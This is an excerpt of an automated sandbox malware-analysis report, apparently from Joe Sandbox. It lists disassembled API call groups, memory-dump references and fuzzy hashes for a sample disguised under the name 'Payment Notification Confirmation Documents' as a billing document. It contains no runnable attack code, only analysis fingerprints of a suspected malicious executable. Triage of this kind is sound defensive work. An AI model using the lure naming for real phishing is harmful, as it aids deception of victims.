                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                              • String ID:
                                                                              • API String ID: 2256411358-0
                                                                              • Opcode ID: b10e136616e899a913842398df942c622b06d3912278e73b646912fe3047a2fc
                                                                              • Instruction ID: 45bb1d557467f7a6f4c7f71bd1c91995250b20be7c7d213e9c8602aed78f7a02
                                                                              • Opcode Fuzzy Hash: b10e136616e899a913842398df942c622b06d3912278e73b646912fe3047a2fc
                                                                              • Instruction Fuzzy Hash: F631E8B051C345DFEB39CB369968BB637ECEB01392F44855DE856C20A0E7B49688DB11
                                                                              APIs
                                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0095C21E,00000000), ref: 0095CF38
                                                                              • InternetReadFile.WININET(?,00000000,?,?), ref: 0095CF6F
                                                                              • GetLastError.KERNEL32(?,00000000,?,?,?,0095C21E,00000000), ref: 0095CFB4
                                                                              • SetEvent.KERNEL32(?,?,00000000,?,?,?,0095C21E,00000000), ref: 0095CFC8
                                                                              • SetEvent.KERNEL32(?,?,00000000,?,?,?,0095C21E,00000000), ref: 0095CFF2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                              • String ID:
                                                                              • API String ID: 3191363074-0
                                                                              • Opcode ID: 574a979e7aafd06ded28a0c0da40191bcbf4233c4145b1e22a5ab34a011aae1b
                                                                              • Instruction ID: 508432495633dd653762fe38d44115f80a5e54342a25c66874692da89165a47c
                                                                              • Opcode Fuzzy Hash: 574a979e7aafd06ded28a0c0da40191bcbf4233c4145b1e22a5ab34a011aae1b
                                                                              • Instruction Fuzzy Hash: AF317FB1604305AFDB24DFA6C8849ABBBFDFF04352B10442EF916D2101DB30ED449B60
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 00941915
                                                                              • PostMessageW.USER32(00000001,00000201,00000001), ref: 009419C1
                                                                              • Sleep.KERNEL32(00000000,?,?,?), ref: 009419C9
                                                                              • PostMessageW.USER32(00000001,00000202,00000000), ref: 009419DA
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?), ref: 009419E2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePostSleep$RectWindow
                                                                              • String ID:
                                                                              • API String ID: 3382505437-0
                                                                              • Opcode ID: a286c5a6f86b50f3e15dc8a40ad3c192255ce75d9e8dac6e4e6035766e7cafd0
                                                                              • Instruction ID: fe1e6838e1c0f325e64d3272efd3ff774aba08150a079763539a274a42582389
                                                                              • Opcode Fuzzy Hash: a286c5a6f86b50f3e15dc8a40ad3c192255ce75d9e8dac6e4e6035766e7cafd0
                                                                              • Instruction Fuzzy Hash: 7E31C072A14219EFCB04CFA8DD99EDE3BB5EB44315F104229F925AB2D1C7709984DB90
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00975745
                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 0097579D
                                                                              • _wcslen.LIBCMT ref: 009757AF
                                                                              • _wcslen.LIBCMT ref: 009757BA
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00975816
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$_wcslen
                                                                              • String ID:
                                                                              • API String ID: 763830540-0
                                                                              • Opcode ID: 942df0691dac8faaf143383c369292fb61458ee1d6410036df732944cbd4360b
                                                                              • Instruction ID: 8b12277b6bb1fb7b13b0bf8a6a7f1b1b98bdbd5637d28e09b52daea4f56f6940
                                                                              • Opcode Fuzzy Hash: 942df0691dac8faaf143383c369292fb61458ee1d6410036df732944cbd4360b
                                                                              • Instruction Fuzzy Hash: 3121D2729046089ADB609FA0CC85AEE77BCFF40720F10C21AEA2DEA1C0D7B08981CF50
                                                                              APIs
                                                                              • GetSysColor.USER32(00000008), ref: 008F98CC
                                                                              • SetTextColor.GDI32(?,?), ref: 008F98D6
                                                                              • SetBkMode.GDI32(?,00000001), ref: 008F98E9
                                                                              • GetStockObject.GDI32(00000005), ref: 008F98F1
                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 008F9952
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Color$LongModeObjectStockTextWindow
                                                                              • String ID:
                                                                              • API String ID: 1860813098-0
                                                                              • Opcode ID: 2cca7308e0a7a1e92971f92b2c22714d13db947240e10683488c91424a150298
                                                                              • Instruction ID: d2f90b4038722319519e87bf04b57b334fdcc00cb3c661012061e361edde8d38
                                                                              • Opcode Fuzzy Hash: 2cca7308e0a7a1e92971f92b2c22714d13db947240e10683488c91424a150298
                                                                              • Instruction Fuzzy Hash: CA21F2726992449FC7228F74EC54BF93F60EB13331B04026DEA968A1A1C7764982DB51
                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 00960951
                                                                              • GetForegroundWindow.USER32 ref: 00960968
                                                                              • GetDC.USER32(00000000), ref: 009609A4
                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 009609B0
                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 009609E8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ForegroundPixelRelease
                                                                              • String ID:
                                                                              • API String ID: 4156661090-0
                                                                              • Opcode ID: 48af42d596322861d6aff966ff588bd9b50558e3750bd2f8d0e5d52b1ee6e5b9
                                                                              • Instruction ID: dbe0de24ec2ff76db63024613189ebb2aa3f6e947fe944568d7bc7361ac94bf2
                                                                              • Opcode Fuzzy Hash: 48af42d596322861d6aff966ff588bd9b50558e3750bd2f8d0e5d52b1ee6e5b9
                                                                              • Instruction Fuzzy Hash: 58219F76600204AFD704EF69C985AAEBBE9EF85741F00842CE84AE7362CB70AD44DB50
                                                                              APIs
                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0091CDC6
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0091CDE9
                                                                                • Part of subcall function 00913820: RtlAllocateHeap.NTDLL(00000000,?,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6,?,008E1129), ref: 00913852
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0091CE0F
                                                                              • _free.LIBCMT ref: 0091CE22
                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0091CE31
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                              • String ID:
                                                                              • API String ID: 336800556-0
                                                                              • Opcode ID: 1efa36b4a3ac340fbef68b5db0035eb72af6654fdef5d59d08fb27407d573a15
                                                                              • Instruction ID: 626ce74f738f4fc55736fc79b7a7c198e95748ace21371676416f041681a778a
                                                                              • Opcode Fuzzy Hash: 1efa36b4a3ac340fbef68b5db0035eb72af6654fdef5d59d08fb27407d573a15
                                                                              • Instruction Fuzzy Hash: A701F7F37452197F232116BA6C8DDBF7A6DDFC6BA1315012DFD09C7200EA608D8191B0
                                                                              APIs
                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008F9693
                                                                              • SelectObject.GDI32(?,00000000), ref: 008F96A2
                                                                              • BeginPath.GDI32(?), ref: 008F96B9
                                                                              • SelectObject.GDI32(?,00000000), ref: 008F96E2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                              • String ID:
                                                                              • API String ID: 3225163088-0
                                                                              • Opcode ID: 534cdf23a0c076e34f33359e2667e4a3741d971f3f39b10cda10b013eb272c40
                                                                              • Instruction ID: b4fb2abca25449fdf954f9d65f4212f9867786eae23d47584dce82b1d7dfd3cc
                                                                              • Opcode Fuzzy Hash: 534cdf23a0c076e34f33359e2667e4a3741d971f3f39b10cda10b013eb272c40
                                                                              • Instruction Fuzzy Hash: D121B07182A349EBDB119F68FD247B93BA8FB20366F50031AF554E60B0D3745881EF94
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _memcmp
                                                                              • String ID:
                                                                              • API String ID: 2931989736-0
                                                                              • Opcode ID: 5989b6251be0f78f5255385bdb5b4acbd80254bdbe96670d3654a542fa0e147a
                                                                              • Instruction ID: 0ffdbbd939879d9aebc86e3ea2005f8adbc756a0ef9b475c3e31d3f5d7372ef9
                                                                              • Opcode Fuzzy Hash: 5989b6251be0f78f5255385bdb5b4acbd80254bdbe96670d3654a542fa0e147a
                                                                              • Instruction Fuzzy Hash: 1B01B9B2641605BFE20855509E52FBB739CABA1398F058031FD0CAA282F764EE11C3B1
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,?,0090F2DE,00913863,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6), ref: 00912DFD
                                                                              • _free.LIBCMT ref: 00912E32
                                                                              • _free.LIBCMT ref: 00912E59
                                                                              • SetLastError.KERNEL32(00000000,008E1129), ref: 00912E66
                                                                              • SetLastError.KERNEL32(00000000,008E1129), ref: 00912E6F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$_free
                                                                              • String ID:
                                                                              • API String ID: 3170660625-0
                                                                              • Opcode ID: c7b0d3b8f83e11c0abe2335de0048a4a01bd08931014ea000a02a053048623f5
                                                                              • Instruction ID: b17615d01fd19824f1dac15230fca2f124afa6da502861dbc2dee5f6b81b52ed
                                                                              • Opcode Fuzzy Hash: c7b0d3b8f83e11c0abe2335de0048a4a01bd08931014ea000a02a053048623f5
                                                                              • Instruction Fuzzy Hash: 7A01287334960C6BC61237346C85EEB266DAFC23B5B60442CF829E61D2EF348CF15060
                                                                              APIs
                                                                              • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?,?,0094035E), ref: 0094002B
                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?), ref: 00940046
                                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?), ref: 00940054
                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?), ref: 00940064
                                                                              • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?), ref: 00940070
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 3897988419-0
                                                                              • Opcode ID: f8bb5ca6811b50af588d5880d41eb1337112181ae6482631876029e8785cb0e8
                                                                              • Instruction ID: c18d58b5a6c4ad8ee0da0b72df27c2adcabf2529e8c666759888f23a28b57241
                                                                              • Opcode Fuzzy Hash: f8bb5ca6811b50af588d5880d41eb1337112181ae6482631876029e8785cb0e8
                                                                              • Instruction Fuzzy Hash: CE018FB2610204BFDB204F68DC04FAA7BADEB84791F144128FE09D2210D775DE80DBA0
                                                                              APIs
                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 0094E997
                                                                              • QueryPerformanceFrequency.KERNEL32(?), ref: 0094E9A5
                                                                              • Sleep.KERNEL32(00000000), ref: 0094E9AD
                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 0094E9B7
                                                                              • Sleep.KERNEL32 ref: 0094E9F3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                              • String ID:
                                                                              • API String ID: 2833360925-0
                                                                              • Opcode ID: cbf754440b627041a1157663e2db19ac242ff1e9e714f82b3a2e558f4c379165
                                                                              • Instruction ID: 0bf797a937c16d67713205882244b934df62ec4328805acbbd4fcd539a6e9371
                                                                              • Opcode Fuzzy Hash: cbf754440b627041a1157663e2db19ac242ff1e9e714f82b3a2e558f4c379165
                                                                              • Instruction Fuzzy Hash: CC019E72C19A2EDBCF00AFE4DC49AEDBB78FF08310F40055AE502B2281DB349590DBA1
                                                                              APIs
                                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00941114
                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941120
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 0094112F
                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941136
                                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0094114D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 842720411-0
                                                                              • Opcode ID: 93399809475daf54d8498944f93d6993005413994d41b0db2f888147b2e6b70e
                                                                              • Instruction ID: ed6346fd8692685e4d7d4c83714fbf53ed507eba377ff6f2212bea9e3ac00f2c
                                                                              • Opcode Fuzzy Hash: 93399809475daf54d8498944f93d6993005413994d41b0db2f888147b2e6b70e
                                                                              • Instruction Fuzzy Hash: 1B0131B6114205BFDB154F65DC49E6A3F6EEF89361B104429FA45D7350DB31DC809A60
                                                                              APIs
                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00940FCA
                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00940FD6
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00940FE5
                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00940FEC
                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00941002
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 44706859-0
                                                                              • Opcode ID: ca85b77050feb5228ab05040ce64152c46affd6301037309646a520e9634cd98
                                                                              • Instruction ID: e7d01d534c846caee412c99bf48947b763ae9d983ce9903fa4080c7e4c346a49
                                                                              • Opcode Fuzzy Hash: ca85b77050feb5228ab05040ce64152c46affd6301037309646a520e9634cd98
                                                                              • Instruction Fuzzy Hash: AAF06DB6214301EBDB214FA4EC4DF563FADEF89762F504428FA49D7261CA70DC809A60
                                                                              APIs
                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0094102A
                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00941036
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00941045
                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0094104C
                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00941062
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 44706859-0
                                                                              • Opcode ID: 0526d5b865e0f7ca91364b8d56c48d4956a15b882582acc7370e38ae72f99848
                                                                              • Instruction ID: 845ccc00898175af95d6fcc694a3bc34dcc834dc8c12411eb1bc6339fbf3fc6a
                                                                              • Opcode Fuzzy Hash: 0526d5b865e0f7ca91364b8d56c48d4956a15b882582acc7370e38ae72f99848
                                                                              • Instruction Fuzzy Hash: 22F06DB6214301EBDB215FA4EC49F563BADEF89761F100428FA49D7250CA70D8909A60
                                                                              APIs
                                                                              • CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 00950324
                                                                              • CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 00950331
                                                                              • CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 0095033E
                                                                              • CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 0095034B
                                                                              • CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 00950358
                                                                              • CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 00950365
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
